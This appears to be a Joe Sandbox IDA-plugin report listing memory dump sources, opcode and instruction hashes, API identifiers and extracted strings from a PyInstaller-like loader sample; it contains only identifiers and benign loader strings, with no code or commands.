                                                                                                                                                                                                                                      • Instruction ID: b1e7d8cda83de1feee5b09753c552b6731fafe9d582a01e970f7be3de9df2ccf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4917473A186878BF7A5BA14D889B3E7AA9FF44390FD54179DA4E47780CB38E540CB10
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID:
• String ID: e+000$gfff
• API String ID: 0-3030954782
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
Similarity
• API ID: CurrentFeaturePresentProcessProcessor
• String ID:
• API String ID: 1010374628-0
Strings
Similarity
• API ID:
• String ID: gfffffff
• API String ID: 0-1523873471
Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: TMP
• API String ID: 3215553584-3125297090
APIs
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
Similarity
• API ID:
• String ID:
• API String ID:
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                                      • Instruction ID: e36f5dc5100920d754e5d8565c647e788d8a2e8087a4e546df12ca49efc9e1e4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8C1AE722181E18BD289EA29E87947A73D1FB8930DBD5406BEF87476C6C73CA514DB20
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                                      • Instruction ID: 856e74ad32036fa6863058a9d8fd883cf8086bc6a44279d960b9b03cf07d678e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B4B19D73A0878585FB64AF39C8585BCBBA4EB45B88FA401B5CB4D87395CF29E841C730
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                                      • Instruction ID: 9b39593c6dad9e38680b5cea38545e8865aeea5fef5aae6ff3b9e1f1ab52483a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3481E173A1838186F774AB29E840B7AAA91FF457D4F944675DA9D83B95CF3CE4008B10
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                      • Opcode ID: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
                                                                                                                                                                                                                                      • Instruction ID: f036d346edad6e107e0e637a2f04107476978029971e02dd195caa3af6348d93
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F961D423E0829246FBA4AA28C85467DE681AF40764FD542B9DA5DCB7D5DF6DF8008B20
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                      • Instruction ID: 02e677233d2480c7fd4f05a164665e99806bd23f289788e7f3c35f179f93e709
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94517133A1865186F7649B69C448AB8B3A0EF55B68F644171CF8D87794CF3AF843C760
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                      • Instruction ID: cbc133a56752af4bbdcacbc030a72a3a7c013e31bf808407ad6f49dabcfdd602
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E251B077A1865182F7249B28C840B39B3A0EF44B68FA44271CE8D977A4DF3AF843C754
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
• Instruction ID: 88b5ba53a3b1a8d07e7f71686d69661f350d2952774cbf823977c11f817431b2
• Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
• Instruction Fuzzy Hash: 3D519037A1865282F7249B29C840A3CB3A0EF48B68F644371DE4C877A4CB3AF853C754

Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
• Instruction ID: bad50515f1b04a1ae956838ae098f9e3a70070ab6f5b01fb8b3bd065c1f8e065
• Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
• Instruction Fuzzy Hash: 4851C437A1865186F7249B29C840B78B7A0EF45B58FA58271CE8C97794CF3AF883C754

Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
• Instruction ID: 3d1b2013d3162e81e47a75486e4d0774f1cbb28553d5e62af59c17ac4d6d160c
• Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
• Instruction Fuzzy Hash: 2551A173A1875185F7249B28C848AB8B7A0EF54B58FA44171CF4C977A8DB3AFC42C760

Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
• Instruction ID: c8741d17199962f581fa0367ff3a2fc569e4e1dfb8bac8a5b434003243da94d8
• Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
• Instruction Fuzzy Hash: 5351B037A1865186F7249B28C840A3DB7A1EF44F58FA45271CE4C97798CF3AF942C794

Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
• Instruction ID: c84895071e1fd03f6f34acca5ed52635089021da43f7f406afedd8c0effdd7f6
• Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
• Instruction Fuzzy Hash: 5441C86380964A44FA6599388E04EB8D6809F22BA1DD8D2F0DCD9D73C2DF8CF947C521

Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
• Opcode ID: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
• Instruction ID: 11c6d693fc5fde7047bdd0adae7ca9849274188e941a2970959f3aadc1479cd4
• Opcode Fuzzy Hash: 4700cc90785079b7bb7a0602c46334a4ae9c6cdcc1bc7f68a8ec9cd099c19dcc
• Instruction Fuzzy Hash: 9841BF23714A5982FF04EF2ADE145A9A3A1BB48FD0F999436DE0D97B58DF3DE4428300

Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
• Instruction ID: ec40078d3bb4989388ccb1dcb2840be1f4dab694b2f5f862c1797205d3c6e77f
• Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
• Instruction Fuzzy Hash: C331D433B18B4281F764AB21EC4053EB695AF85BE0F944279EA8D93BD5DF3CE0018754
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
• Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: AddressErrorLastProc
• String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
• API String ID: 199729137-3427451314
APIs
  • Part of subcall function 00007FF70AEF9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF70AEF45E4,00000000,00007FF70AEF1985), ref: 00007FF70AEF9439
• ExpandEnvironmentStringsW.KERNEL32(?,00007FF70AEF88A7,?,?,00000000,00007FF70AEF3CBB), ref: 00007FF70AEF821C
  • Part of subcall function 00007FF70AEF2810: MessageBoxW.USER32 ref: 00007FF70AEF28EA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
• String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
• API String ID: 1662231829-930877121
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: MoveWindow$ObjectSelect$DrawReleaseText
• String ID: P%
• API String ID: 2147705588-2959514604
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
Similarity
• API ID: LongWindow$BlockCreateErrorLastReasonShutdown
• String ID: Needs to remove its temporary files.
• API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                      • Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                      • Instruction ID: de84b2028bb02f28c0566a1b4292edd95e41cc1ead2eeb60be7d88fe200f9ed9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3216227B08A43C1FB55AB7AEC55169A350EF88B90FC842B1DA2D43395DF2CE5908221
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID: -$:$f$p$p
                                                                                                                                                                                                                                      • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                      • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                      • Instruction ID: ea1f3d39af846da2f22d00ebd0f2e934ab61921b1e8ea1c7ffc5d2c0794b4907
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7D127F63E0C15386FBA07A14D954A79B6A2FF40754FC44175E68ACBAC4DFBCF5A08B20
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID: f$f$p$p$f
                                                                                                                                                                                                                                      • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                      • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                      • Instruction ID: f7ae7d69a8883e34aa2252b19a740cfb38b11d8db6866dce89720b897bd2d6bf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
